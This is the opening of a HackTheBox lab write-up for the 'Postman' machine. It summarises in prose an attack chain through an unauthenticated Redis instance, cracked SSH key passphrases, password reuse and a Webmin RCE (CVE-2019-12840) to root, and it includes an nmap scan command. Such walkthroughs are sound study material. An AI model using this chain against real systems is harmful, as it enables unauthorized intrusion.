Summary

Postman is an easy-rated Linux machine on HackTheBox. The box exposes an unauthenticated Redis instance that allows writing an SSH public key to the redis user's .ssh directory, granting initial shell access. From there, an encrypted RSA private key belonging to user Matt is recovered, cracked offline with John the Ripper, and reused (due to password reuse) to su into Matt for the user flag. Enumeration of Matt's owned files reveals a hint pointing to the previously unchecked Webmin service on port 10000, where the same reused password grants admin access to Webmin 1.910 — vulnerable to CVE-2019-12840, an authenticated RCE via the Package Updates module — leading to a root shell.

Recon

nmap -sC -sV -p- -A <MACHINE-IP> -oA nmap

Enter fullscreen mode